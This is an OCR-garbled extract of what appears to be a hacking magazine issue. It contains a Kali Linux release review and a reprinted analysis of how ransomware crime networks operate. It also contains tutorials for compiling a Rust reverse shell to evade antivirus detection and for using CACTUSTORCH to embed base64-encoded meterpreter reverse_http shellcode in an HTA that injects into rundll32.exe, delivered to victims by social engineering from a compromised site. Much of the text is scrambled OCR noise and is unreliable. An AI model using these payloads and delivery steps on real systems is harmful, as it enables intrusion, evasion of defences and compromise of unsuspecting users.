Buer downloader was coded in C since 2019. However, this time it is written ln Rust. Rewriting the malware in a new language like Rust enables hackers to better evade Buer detecti Fon mechanism. Since Buer was written in C since it began, Anti Malware vendors would write detection lsignatures for C only. So they would naturally fail to detect Buer in Rust, a unexpectedly new language. In this article readers will learn how to work with Rust payloads in Kali Linux, create a reverse shell land test its antivirus evasion capabilities practically. Rust can be downloaded on Kali Linux by using the lcommand given below. https://sh.rustup.rs u SO CaS L RN ae re Welcome to Rust! SCR COMO CL RU Cre Ue ee tacl a eC eS Pee OCU CMU Meee te cM OC ae Oe Rustup metadata and toolchains will be installed into the Rustup eer eas le eee Cece CAA LOU ee ea) Ue eM RRR RRM SCR OLR hee acs Cree ed /home/kali/.cargo 32 | Hackercool Magazine | May 2021This can be modified with the CARGO_HOME environment variable The cargo, rustc, rustup and other commands will be added to Cargo's bin directory, located at: PA TAC aU Le UC eR a UA Se ie ROS AU Mt chee MOC Cle bee PAUSES Leen Tolga CAUSA Sears You can uninstall at any time with rustup self uninstall and these changes will be reverted eee eee ae default host triple: 1686-unknown-ltnux-gnu default toolchain: stable (default) A ties modify PATH variable: yes 1) Proceed with installation (default) Pease Le Lac) Pe eee Lee Lat) ca | [Proceed with the default installati ete Ceca a) lS he Rae Leo) fee Re ee Lace) <= : profile set to ‘default’ CFG hee CMO EL Ue eee) syncing channel updates for '‘stable-i686-unknown-linux-gnu latest update on 2021-05-10, rust version 1.52.1 (9bc8c42bb 2021-05-09) OCR Me Ct aoe eC) 6.1 MiB / 6.1 MiB (100 %) 1.8 MiB/s in 4s ETA: Os info: downloading component ‘clippy' re alms 2.5 MiB ( 21 %) @ B/s in 2s ETA: Unknown 33 | Hackercool Magazine | May 2021info: installing component ‘rustfmt CC eee CMe ae Cee et ea en hee: i a stalled - rustc 1.52.1 (9bc8c42b Pr LPe OE a) US aR TR Ml) ele Oca Ra eee ee ea This would reload your PATH environment variable to include Cargo's bin directory ($HOME/.cargo/bin). SOU ge ae Eerie Laer /e need to update the cargo and rust prot rust commands from anywhere on the terminal. Bla at lee We can test if rust is successfully installed on the kali using command ruste --version. Rust is installed lsuccessfully. Its time to work with rust programming. We create a new directory named rust-lang to place| lll the newly created rust programs we create. rustc ees Py 2021-05-09) Pereatut eae ar Seu] Inside this directory, we create a new file named test.rs (name can be anything) and write a small progr- lam. This is the famous hello world program which we edited a bit to display the message "Hello Hackercool Labs. If this message is displayed, you can be sure rust is working” 34 | Hackercool Magazine | May 2021oetytg Se Cn ee ee ee Ce ee Un et a eck cag} We save the file and compile it using the rust compiler as shown below. This will create a binary of the ust source file as shown below. a SCL] oo ane ar SCur) ace ar eur] est test.rs /e execute it just as we execute any Linux binary. are) Hello Hackercool Labs. If this message is displayed you can be sur Chance scr e he program is working fine. Well, this is not just it. Rust has a package manager and build system. This ls named Cargo. Cargo builds code, downloads the libraries needed for this code to run and building hose libraries without the need of users doing it manually. ecu) Cee Cc RC te USAGE: (r-Tae (eae Rea Ren ee) Le PCE See es ae eC UCR mas -list List installed commands eer eT a Sees: etme) 3 aa ts Tea ets ae en nen Te a) Pega Ree he Ta) cerns TORS a aC RR eae sd CSC eMC LOC een Ts aac Per hee eT ee ec Cee Cried 35 | Hackercool Magazine | May 2021lalso has another directory named src. Inside the src dire Poon CSR cL a eM Ae CML Chea Created binary (application) “hello_hackercool* package kalt@ kalt)-[~/rust-Lang] | Lee tem ceca) Perectanetae Pee eee Tee LOC ML Tac gy a Nae ee authors = ["kali"] Chea # See more keys and their definitions at https://doc.rust-lang.org ete ae ee eee eur ate [ (kal l@ kalt)-(~/rust-Lang/hello_hackercool | om | kalt@ kalt)-|~/rust-lang) See AGM he Peed ee ~/rust-lang/hello_hackercool eC kallS kalt)-[~/rust-Lang/hello_hackercool cas Po eeoe cas Cae SC eee ee rn Chm) [By default, this is the default hello world script. Peo RS RCar CU aC Cans eee eer Gerd OTe ee Uae aCe aC Pee aS ~/rust-lang/hello_hackercool/sre Hackercool MagazineWe got some eal tia Te] News To You Hackercoolians Hackercool Magazine iT be Available in Jalal t Very Soonkall® kall)-[~/rust-Lang/hello_hackercool | $ a: ) Comptttng hello_hackercool v0.1.0 (/home/kali/rust-lang/hello_h Ela ieee) CE MMe) peaches Meal Re ela 8 ed pe Ar CU CMa | cet ce ~/rust-Lang/hello_hackercool | ete Crag reece is SL) Pres ea CML eet errr oy |— hello_hackercool-dfbe3a1151ddee42 SGC Ma ater ere est Cre eat) Pod SMC ctr aC Mca cette] Seu cle A Ws Tae ee [ Peel ee ~/rust-lLang/hello_hackercool om | his file can be executed using cargo run command. kall® kalt)-(~/rust-lLang/hello_hackercool 7 tt Finished dev [unoptimized + debuginfo] target(s) in 0.01s t/debug/hello_hackercool” Po eeCL Clas ~/rust-Lang/hello_hackercool he program is running fine as it printed back the message. Nat let's create a new project which is that Hackercool Magazineprarev jal with eae Tee) 7 Pee mea Created binary (application) “reverse_shell” package he information to download the source code for the Rust reverse shell can be found in our Downloads lsection. Copy this code into the main.rs file of the reverse_shell directory. (kalt@ kalt)-[~/rust-lang Se LL (kalt® kalt)-[~/rust-Lang/reverse_shell) ] rie eC ee kalt@ kalt)-[~/rust-lang/reverse_shell] oe la ec Loe c lee ~/rust-lang/reverse_shell/sre 5 ate) kalt@ kali )-[~/rust-Lang/reverse_shell/sre sg main.rs Om Lue mee ae aCe eto Prescihiees te eo Ree PIStere Cece CreHE ) Pee oe eran et tee ores} Pee ORL Cerny Ea Sareea eet om rosea neem eer Reet tre oe Reece rater enero renee zt perry St tee Ee error Y ene Meee Ogi Pera Teena em TET Penn eee ees |Let's build this reverse shell project in the same way as we built the hello world project. jackercool Magazinekalt@ kalt ~/rust-lang/reverse_shell $ Pee) ee Oe OAC Rede RRC Uae eee ell) dev [unoptimized + debuginfo] target(s) in 3.88s Peo er Te ee eee ee TT) $ build examples Cl Stig he ee) 7 te [Before executing the reverse shell, we start a netcat listener on the same machine. kalt@ kalt)-[~ $ ere Listening on [any] 4444 kalt@ kalt)-[~ $ rrr Re Ce Bees Tyee eel ee ee a eC EM Ca connect to [192.168.36.171] from (UNKNOWN) [192.168.36.171] 60548 kall@ kalt)-[~/rust-lang/reverse_shell/target/debug a hen we execute the binary, we successfully get a connection, ofcourse from the same machine. The shell is working. Here comes the important part. The rust reverse shell is working but how does itKali Linux 2021.2 WHAT'S NEW The makers of Kali Linux released the second release of Kali Linux, Kali Linux 2021.2 on June 1 2021. Let's see what's new in this release. Hi All. | am Mala and today | am gonna show you what's new in newly released Kali Linux 2021.2. First thing | noticed after booting up Kali Linux 2021.2 is its new Login Background. || logged in (credentials kali:kali) and also see a new Desktop backgrouns‘course you will nal lng Labs. These are th a ] cr Normally, the makers of Kali would change the default login and desktop as well as other art work every lsix months. From this release, they are going to change the defaults at every 20xx.1 release that is at th- le beginning fof the year. They also said that they will still add extra wallpapers every 6 months, however, lonly change the defaults yearly. a1 | Hackercool MagazineTey also made some changes to the Cuick Launch Tray in top Telf. The Screen recorder has bean ramo | ved and mousepad text editor and a web browser ico have been added. Adding a text editor is a good lmove as it is cumbersome to open terminal and open a text editor always when we need to add notes. BS \eaeeoe-| ema el oe Were Welcome to Kali Linux The Industry's Most Advanced Penetration Testing Distribution [The Quick Launch Tray also has a drop down menu for the default Terminal. BS ieaeree-| eee ca ali cee [All the applications we open can be seen to the right of the Quick Launch Tray, X{ce's default file manager, Thunar also got some changes. If you open the File Manager and right| |-click in the main window, you can see a new option, Open as Root. This can be used to open some dire [otories which have higher privileges. AZ| Hackercool Magazine | May 2027om eet cree rm = Computer maicll or Yee dat Documents sen Tet tr ee Devices [olen ead fs eres I users have been using the latest versions of kali 'SH has a two-line prompt as shown below Pe ee Pictures technowhorse Soria nm Lc Ni eee aoe Tc Cheers @ Open Terminal Here ar Py Coe ‘ecently, you should have observed that the defaultHowever, this change is temporary ands only etfeclive for the current session, This can be made perma [nent using kali-tweaks. What is kali-tweaks? Kali-tweaks introduced in this release only is a little helping hand for Kali users, to help them |customize Kali according to their personal taste quickly, simply, and the correct way. Users can make changes to four things using Kali-tweaks. They are Metapackages, Network Repositories, Shell & Prompt! land Virtualization. kali@ kali 5 PStCL Ces cy Network Repositories configure network repositories for APT sources Shell & Prompt Configure the shell and comand prompt Virtualization Additional configurations for Virtual achines |Metapackages can be tweaked to install and remove groups of tools, which may not have been available lwhile installing Kali if you did not use the particular installer image. nevapackages. F luetooth attacks tools crypto-stego Cryptography and Steganography tools fuzzing fuzzing attacks tools sapu GPU tools. hardware hardware attacks tools rig RFID tools. sdr SOR tools ‘top10 Kali Linux's top 10 toots voip. VoIP tools. Windows-resources Windows resources kali-Unux-default Kali Linux's default packages (headless & GUI) EAT Hackercoo! Magazine | May 2027[Using Kall tweaks, network repositories can be tweaked. Users can enable or disable "blecding-edge” & l'experimental" branches. 7 Network Repository Additional Kali repositories: II} bleeding-edge Automatically packaged and potentially unstable [1 experimental Staging area for work-in-progress packages |Using kali tweaks, users can switch between two or one line prompt (as already mentioned), enable or ldisable the extra line before the prompt, or configure Bash or ZSH as the default shell Main Menu Hetapackages Install specific subsets of tools for particular needs Network Repositories Configure network repositories for APT sources Virtualization ‘Additional configurations for Virtual Machines: Shell & Prompt sumo TER Default Login shell set the default Login shell Reset Shell Config Reset the shell config files to their defaultComand Prompt Proapt styte {H Two Lines Dual blue Line prompt (°) One Line Single Blue Line promt () BackTrack Legacy BackTrack red prompt Prompt Settings: [+] Newline Add 2 new Line between output and prompt tack jp Default Login shell to use: () Bash Bourne Again sHelt () zsh Z SHELL If you are running kali as a Guest Os in Vmware or Virtualbox, then you can use kali-tweaks to improve lsome features. However, it returned some error to me while checking it out. Might be a bug. vain ren F Hetapackages Install specific subsets of tools for particular needs Network Repositories Configure network repositories for APT sources ule pra ctigurs the sel ad comand proms equity jackercool Magazine | MayVirtualization iG id ro) eu SC ne acca eu CCC Dt ELL eC Kevan Lec S Cd Se ce Deca ne Pita rig sue mee eeu ty Breer mc tomy gral bet cee see Me Cast ee een) File "/usr/Lib/python3/dist-packages/kali_tweaks/_main_.py*, Line 699, in main Ceol par) PRC TAty iste ec ye ae Oe ae Une eRe) File "/usr/Lib/python3/dist-packages/kali_tweaks/ main .py", Line 531, in do virtual_screen Carcoastoita) CMA Ce ec em ae Ome eee} pina reeset) PIC Cem ote ee eC UBC We eric Erma eu eu) PCMH CL eee ons ane UR Ute L) Eiuascit Marre ueeC Ted ar Cae eS] It might be soon fixed. Let me move forward. With this release, the kernel has been patched to enabl lusers to use ports 0-1023 without SUDO privileges. This is quite useful to Hackercool Labs as earlier we to start a listener on common ports, we needed SUDO privileges even in Metasploit. For example, whilefelting up a molerpreter/reverse_hillps or meterpreter/reverse_hllp listener, the listening port commonly lneeded is 443 and 80 respectively. They needed SUDO privileges earlier. eve} So ee i SS p 80 listening on [any] 80 ... ee RAR mo LeoRe A GSAT leet Using configured payload generic/shell_reverse tcp sf6 exploit(multi/handler) > set Lhost 192.168.36.192 lhost => 192.168.36.192 msf6 exploit(multi/handler) > set lport 80 lport 80 i ene ee eA Cee meal) Started reverse TCP handler on 192.168.36.192:80 lust like other releases of Kali Linux, this version too got some new tools added in Kali's archive and net -work repositories. These tools are, 1. CloudBrute - Find a company infrastructure, files, and apps on the top cloud providers 2. Dirsearch - Brute force directories and files in web servers 3. Feroxbuster - Simple, fast, recursive content discovery 4. Ghidra - Reverse engineering framework 5. Pacu - AWS exploitation framework 6. Peirates - Kubernetes penetration 7. Quark-Engine - Android malware scoring system 8. VSCode a.k.a. Visual Studio Code Open Source (“Code-OSS") - Code editor hese are the changes the makers of Kali Linux made in the latest release that may affect users. Apart rom these changes there is another change that users may not notice. Enter Kaboxer. Kaboxer also known as Kali Applications Boxer is a great tool in the arsenal of Kali Linux which users may not realize hile using it but is very helpful for developers. That is because Kaboxer helps even problematic tools (0 run without any problem How does Kaboxer do this? Any application in Kali Linux has a package manager through which it Is installed and uninstalled (apt). However, every tool cannot be packaged this way. So developers work ith the tool authors to bering it into kali. This can be long. But now, with Kaboxer, even that tools which ere not packable previously can be packed in a container and integrated with the Linux operating syste |m. Users need not take any action for this to work. Using this. many new tools (which cannot be include Ld previously) can be included in the Kali Linux. These are all the changes brought in the latest release of Kali Linux. You can download the latest /ersion of Kali by going to the link given below in our Downloads section, AB] Hackercool Magazine | May 2027Inside a ransomware attack : How dark webs of cybercriminals collaborate to pull one off. ONLINE SECURITY ‘down through the crime chain and fuel other cyber David S. Wall crimes. Professor Of Crminology Ransomware attacks are also changing. The University Of Leeds criminal industry's business model has shifted towar| -ds providing ransomware as a service. This means In their Carbis Bay communique, the G7 operators provide the malicious software, manage pronounced their intention to work together to tackle the extortion and payment systems and manage the| nsomware groups. Days later, US president Joe reputation of the ‘brand’. But to reduce their exposu Biden met with Russian president Vladimir Putin, _-re to the risk of arrest, they recruit affliates on gen- here an extradition process to bring Russian cybe erous commissions to use their software to launch + criminals to justice in the US was discussed. attacks. Putin reportedly agreed in principle, but insisted This has resulted in an extensive distribution of that extradition be reciprocal. Time will tell if an extr criminal labour, where the people who own the mal dition treaty can be reached, But if itis, who exact ware are not necessarily the same as those who ly should be extradited — and what for? plan or execute ransomware attacks. To complicate The problem for law enforcement is that ransom things further, both are assisted in committing their fare — a form of malware used to steal organisation crimes by services offered by the wider cybercrime Fr and hold it to "First, there’s the reconnaissance, ecosystem. nsom—isavery — where criminals identify potential victims How do ransomware i ' : 2 Blippery fish. Not only and access points to their networks. _, attacks work? s ita blended crime, There are several stages toa noluding different offence //S is followed by a hacker gaining ;ansomware attack, which | .cross different bodies of law, but it's ‘initial access" have teased out after analysing over 4,000 Iso a crime that straddles the remit of different poli attacks from between 2012 and 2021. cing agencies and, in many cases, countries. And First, there's the reconnaissance, where crimi- |there is no one key offender. Ransomware attacks _ nals identify potential victims and access points to involve a distributed network of different cyber their networks. This is followed by a hacker gaining riminals, often unknown to each other to reduce th “initial access”, using log-in credentials bought on @ risk of arrest. the dark web or obtained through deception. So it's important to look at these attacks in detail Once initial access is gained, attackers seek understand how the US and the G7 might go abo to escalate their access privileges, allowing them to ut tackling the increasing number of ransomware _ search for key organisational data that will cause ittacks we've seen during the pandemic, with at the victim the most pain when stolen and held to ra- fs 128 publicly disclosed incidents taking place _nsom. This is why hospital medical records and poli lobally in May 2021 -ce records are often the target of ransomware atta- What we find when we connect the dots is a_cks. This key data is then extracted and saved by professional industry far removed from the organise criminals — all before any ransomware is installed d crime playbook, which seemingly takes its inspira and activated. tion straight from the pages of a business studies Next comes the victim organisation's first sign jmanual. that they've been attacked: the ransomware is depl- The ransomware industry is responsible fora _oyed, locking organisations from their key data. The| luge amount of disruption in today’s world. Not only victim is quickly named and shamed via the ransom io these attacks have a crippling economic effect, ware gang’s leak website, located on the dark web. sting billions of dollars in damage, but the stolen That “press release” may also feature threats to shaj fata acquired by attackers can continue to cascade -re stolen sensitive data, with the aim of frightening 49 | Hackercool Magazine | May 2021~yplocurrency and turn Winto fat currency, while negotiators, representing both victim and offender, are hired to settle the ransom amount. This ecosystem is constantly evolving. For example, a recent development has been the emer- gence of the “ransomware consultant’, who collects a fee for advising offenders at key stages of an attack. The Cybercrime System Arresting Offenders e victim into paying the ransom demand. Successful ransomware attacks see the ransom aid in cryptocurrency, which is difficult to trace, an- converted and laundered into fiat currency. Cyber riminals often invest the proceeds to enhance their pabilities — and to pay affiliates — so they don’t yet caught. Governments and law enforcement agencies| appear to be ramping up their efforts to tackle ransomware offenders, following a year blighted by their continued attacks. As the G7 met in Comwall ateremegesata "in June 2021, Ukrainian and South Korean police tack. These poupe beneat'AS the G7 met in Cornwall in June forces coordinated to arrest] ‘om this inter-dependency, 2021, Ukrainian and South Korean &lements of the infamous a A CLOP ransomware gang. In s it offsets criminal liability police forces coordinated to arrest 4. same week, Russian teach stage. elements of the infamous CLOP i ‘And there are plenty of PEEP wad aaicoe Olea Koshkin was pecialisations in the cybercrime under gang." convicted by a US court for running a malware encryption service that criminal groups use orld. There are spammers, who hire out spamwar- as-a-service software that phish ers, scammers, ‘© Perform cyberattacks without being detected by antivirus solutions. nd fraudsters use to steal people's credentials, While these devel ‘s nd databrokers who trade these stolen details on ne these Cevalopments are promising, ransomware attacks are a complex crime involving fhe dark web. ee They might be purchased by “initial access _& distributed network of offenders. As the offenders rer ho sped garing ii ey to Neve honed te methods, law enforcers an cyber iter syste- ms before selling on th 4 eee eee ee eae a er nee those. -ative inflexibility of policing arrangements, and the letails to would-be ransomware attackers. These ftackers often engage with crimeware-as-a-service [20k of @ Key offender (Mr or Mrs Big) to arrest, may rokers, who hire out ransomware-as-a-service soft #Ways Keep them one step behind the cyber are as well as other malicious malware. criminals — even if an extradition treaty is struck To coordinate these groups, darkmarketeers Petween the US and Russia. |provide online markets where criminals can openly . - lsell or trade services, usually via the Tor network Article First Appeared n the dark web. Monetisers are there to launder cr on theconversation.com While it's feasible that a suitably skilled offender uld perform each of the functions, it's highly unlik- ly. To reduce the risk of being caught, offender roups tend to develop and master specialist skills Follow Hackercool Magazine For Latest Updates BUT Hackercool Magazine [May 202TCACTUS TORCH \ TOOL OF THE MONTH |Cactus torch is a shellcode launcher tool that can be used to launch 32 bit shellcode in various attacks. his shellcode can then be injected into any Windows binaries. Windows binaries are those binaries tha Lt are already present on a Windows system. Just imagine your pen testing a Windows machine and you lwant to gain access to it without bringing any third party Malware to the target system. How about using he files already present on the target system to execute your payload. This is also known as file less Imalware. Windows by default has some binaries for its own genuine functions. However these can be utilized lby malicious actors to execute their own payload which is not benign. Examples of these binaries are jregsrvr32.exe, notepad.exe, calc.exe and rundll32.exe etc. Rundll32.exe is a binary used in windows to link library for other Windows applications. Readers know about notepad and calculator. This is where cactus torch comes into picture. It can be used to inject the generated shellcode into the above mentioned binaries. Let's see how this tool works. Cactus torch can be cloned from GitHub as| lshown below. The download information for cactus torch is given in our Downloads section. clone https://github.com/mdsecact tvebreach/CACTUSTORCH Cloning into 'CACTUSTORCH’... ee eS lS ea eee remote: Total 48 (delta 0), reused 0 (delta ©), pack-reused 48 Receiving objects: 100% (48/48), 42.13 KiB | 1.62 MiB/s, done Resolving deltas: 100% (23/23), done. |Once the tool is cloned, we need to create shellcode. Cactus torch is compatible with Metasploit and \Cobalt strike. Let's use msfvenom to create 32 bit shellcode, i windows/meterpreter/reverse_http Lhost=192.168.36. Osea gery eee ee EVA Te em Oe ree eee Ca ee Ce eee Ee Ce arr [-] No arch selected, selecting arch: x86 from the payload Ce ae ace Re ree ACL ACL Met Ea he shellcode is successfully created and is stored in payload.bin file. Next, ecode this payload using base64 encoding as shown below. Poieer nth mCi COM OOc ma est Ce Eee ae 1) Sss@>Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:41.0) Like Gecko PN SSR Macrae a meses Lary Pi osstapinmreimaan en ata Wale ee arent seas tea eer Cla el ee eee eee el GG LMC Le ae eC COME Ly Leet Ce CURC RU AC ras G DCLG IA Mica Cela |) Po ta Ue C3] Sm Come Don reo ee Td Cit eet gE) 51 | Hackercool Magazine | May 2021at payload.bin rrr 0 UU PaO ease cee eetr CLS ae LO alee Balle lol Lae ke TQV4tCPAHQi OB4hcBOTAHQi 1ggAdNQidgYhc LOPDH/SYsOiwHWMcCswc8NAcc44HXO A334030kdeBY i 1gkAdNmiwxLi1gcAdOLBIsBOI1EJCRDW2FZW1H/4FhfWosS6YD/// Pree PA COLL PAU kU Mec UY CUCL Deka Fame Cea Du CoE) RMR) Re Deda eed el meee eee ME a eco Chew oe) Al eels lel eal /VUANGAINTaMERAADobgEAAC9mMGSUCHFBRXRnNCO1RF9SWGLUM1V3ZVLWZEMSbmVp PAT ele elt) eA e GU UR Pe UM tPRe eA Pig mule erat ha Ber Le PORE FUSLBDODN2Y@tENKJXYOhpSEZvcF p6MUxCcnY3TGdmV1LTcVJwaDhtbOZOZDViMGst eee CSM ég eee Orel meas eT ede ra RM ey 1hULROUj Lua2Y1X0tGa j gSWGRmaWxmR194QThpZ21 idUdXZLLLTXUydELNT21YNjhD bWhpWVRGSOVWd2czZAFBoV4mfxv/VicZTaAACaIRTUINXU1Z06 1Uu0//VLmoKX1NTU1 NWaC@GGHv/1YXAdRRoiBMAAGhE8DXg/9VPdeHoSwAAAGpAaAAQAABoAABAAFNOWKRT 5f/Vk1NTiedXaAAgAABTVgS Lon i/9WFwHTP iwcBw4xXAdeVYw1/of////ZESMi4xNj guMzYuMTcxALvwtaJWagBT/9U= co LJ shellcode can be hosted in different formats as shown below. These are already provided torch ~/CACTUSTORCH | banner.txt CACTUSTORCH.hta CACTUSTORCH.vba README.md CACTUSTORCH.cna CACTUSTORCH. js CACTUSTORCH.vbe splitvba.py CACTUSTORCH. jse CACTUSTORCH. vbs lLet's see the example of hta file. Open the cactustorch.hta file using any text editor fd *CACTUSTORCH.hta ieee me LL) ' A HTA shellcode launcher. This will spawn a 32 bit version of - ET Choose a binary you want to inject into, default "rund1132.exe Generate a 32 bit raw shellcode in whatever framework you want Run: cat payload.bin | base64 -w 0 Copy the base64 encoded payload into the code variable below. Nem he SUT amc man aC ae t en ey Dim binary : binary = “rundl132.exe" " Base64 encoded 32 bit shellcode Dim code : code = "/OiPAAAAYIn(MdJkillwilIMilIUD7dKJotyKDH/McCsP\ Sub Debug(s) 32 | Hackercool Magazine | May 2024fou can specify the binary you want to inject this shellcode into. For example, here we want to inject sI Hlicode into rundli32.exe. Copy the base64 encoded shellcode at Dim code. Save the file. Start a Metas- ploit listener as shown below. ieee eae eam Ur muae ie MarR Cu ete eee et ae) eee eae ean rer mC Ce et Cee rse_http PCC MMU SA ee eae eae Ae eae} em eree ean see CCE eee Tia SCPE U EE msf6 exploit( ean eae et) lport => 4545 ee eee ema [*] Started HTTP reverse handler on http://192.168.36.171:4545 | INext, all we have to do is make the user on target system execute the cactus torch. hta file. This can be tone using social engineering. For example just like in our April 2021 Real World Hacking Scenario. In hat scenario, Hackercool compromised a website and hosted malware there, Here also it can be the sa- Ime scenario, Now once someone clicks on it, we should get a successful meterpreter session as shown lbetow. ee eee ante ae ert) rye wee or) Teme eh eat ) > run [*] Started HTTP reverse handler on http://192.168.36.171:4545 [!] http://192.168.36.171:4545 handling request from 192.168.36.1; (UUID: ikq9gcxl) Without a database connected that payload UUID t racking will not work! [*] http://192.168.36.171:4545 handling request from 192.168.36.1; (UUID: ikg9gcxl) Staging x86 payload (176220 bytes) . ] http://192.168.36.171:4545 handling request from 192.168.36.1; (UUID: ikg9gcxl) Without a database connected that payload UUID t AAU eae eee eR ce eee Ce Ct CeCe eee eee ) at 2021-06-19 10:40:37 -0400 Lae ee \Similarly, this shellcode can be hosted in JavaScript and also VB script and VBA files. However, note that these are not undetectable and anti-virus will easily detect the shellcode. Hackercool Magazine | May 2021DOWNLOADS Phish : https://github.com/gophish/gophish/releases 2. Kali Linux 2021.2 : https://www.kali.org/get-kali/#kali-bare-metal 3. Nagios XI: https://www.nagios.org/downloads/ 4. Rust Reverse Shell : https: WIgithub.. .com/LukeDSchenk/rust-backdoors 5. Cactus Torch Tool : https://github.com/mdsecactivebreach/CACTUSTORCH [ USEFUL RESOURCES | Check whether your email is a part of any data breach now. https://haveibeenpwned.com Hackercool Magazine is also available on gumroad MAGZTER A 2: Zinio’ MAGAZINES Mel